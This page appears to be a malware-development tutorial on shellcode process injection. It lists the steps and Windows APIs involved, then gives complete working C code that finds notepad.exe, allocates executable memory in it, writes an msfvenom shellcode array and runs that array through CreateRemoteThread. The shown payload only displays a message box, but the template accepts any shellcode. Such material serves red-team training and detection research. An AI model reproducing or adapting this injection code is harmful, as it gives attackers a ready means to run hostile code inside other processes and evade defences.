Shellcode Process Injection

Basic process injection

https://github.com/josh-vr/Malware-Dev-Templates/tree/main/Shellcode%20Process%20Injectiongithub.com

My Corresponding GitHub Page

General Steps

• Save a list of all running processes

• Search for the defined target process

• Extract the PID of the target process

• Open the target process

• Allocate memory in target process

• Inject code into target process

• Execute the injected code

Windows APIs

• CreateToolhelp32Snapshot to create a "snapshot" of all processes in the system to later enumerate

• Process32First to start enumerating the list of processes from the snapshot starting from the first

• Process32Next goes to the next process in the snapshot

• OpenProcess to open a handle to the target process

• VirtualAllocEx to allocated memory in the target process

• WriteProcessMemory to write the payload into the allocated memory spaces

• CreateRemoteThread to start executing a thread in the process to run the payload

• WaitForSingleObject to pause execution of the injecting process until the injected code is completed or the specified time amount (500 milliseconds in the code)

• CloseHandle to close a handle

Code

//
// Shellcode Process Injection
//
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <stdbool.h>



// 
// Definitions that you may want to change
// 
#define PRINT_STATEMENTS true
#define TARGET_PROCESS "notepad.exe"



// 
// Declaring and initializing the payload and length of payload
// Payload is message box generated from msfvenom
//
unsigned char payload[] = { 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x54,0x68,0x65,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64,0x20,0x77,0x61,0x73,0x20,0x73,0x75,0x63,0x63,0x65,0x73,0x73,0x66,0x75,0x6c,0x6c,0x79,0x20,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x64,0x21,0x00,0x53,0x75,0x63,0x63,0x65,0x73,0x73,0x21,0x00 };
unsigned int payload_len = sizeof(payload);



//
// Function prototypes for helper functions
// 
int findProcess(void);
int inject(int target_pid);



//
// Main function to handle program flow
// 
int main(void)
{   
    int target_pid = 0;
    int inject_result = 0;

    target_pid = findProcess();

    if(target_pid)
    {
        inject_result = inject(target_pid);
    }

    return 0;
}



//
// Helper function to find target process defined above
// 
int findProcess(void)
{
    HANDLE process_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 process_info;
    process_info.dwSize = sizeof(process_info);
    bool proc_next = false;

    if (process_snapshot == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot failed");
        return 1;
    }

    if (!Process32First(process_snapshot, &process_info))
    {
        printf("Process32First failed");
        return 1;
    }

    if (PRINT_STATEMENTS)
    {
        printf("\n");
        printf("[+] Successfully took a snapshot of all processes\n");
        printf("[+] Finding target process: %s\n", TARGET_PROCESS);
    }    

    while (true)
    {
        if (lstrcmpiA(process_info.szExeFile, TARGET_PROCESS) == 0)
        {   
            if (PRINT_STATEMENTS)
            {
                printf("[+] Found target process: %s\n", TARGET_PROCESS);
                printf("[+] Target process PID: %d\n", process_info.th32ProcessID);                
            }

            CloseHandle(process_snapshot);
            return (int) process_info.th32ProcessID;
        }

        proc_next = Process32Next(process_snapshot, &process_info);
        
        if (proc_next == false)
        {
            if(PRINT_STATEMENTS)
            {
                printf("[+] Could not find the target process\n");                
            }

            CloseHandle(process_snapshot);
            break;
        }
    }

    return 0;
}



//
// Helper function to perform remote code injection
// 
int inject(int target_pid)
{
    HANDLE target_handle = NULL;
    HANDLE target_thread_handle = NULL;
    LPVOID page_address = NULL;

    target_handle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, (DWORD) target_pid);

    if (target_handle == NULL)
    {
        return 1;
    }

    if (PRINT_STATEMENTS)
    {
        printf("[+] Opened target process successfully\n");
    }

    page_address = VirtualAllocEx(target_handle, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
    WriteProcessMemory(target_handle, page_address, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL );
    target_thread_handle = CreateRemoteThread(target_handle, NULL, 0, page_address, NULL, 0, NULL); 
    
    if (target_thread_handle != NULL)
    {
        if (PRINT_STATEMENTS)
        {
            printf("[+] Successfully injected code... executing shellcode\n");
        }
        WaitForSingleObject(target_thread_handle, 500);
        CloseHandle(target_thread_handle);
        return 0;
    }

    else
    {
        return 1;
    }
    
    CloseHandle(target_handle);
    return 0;
}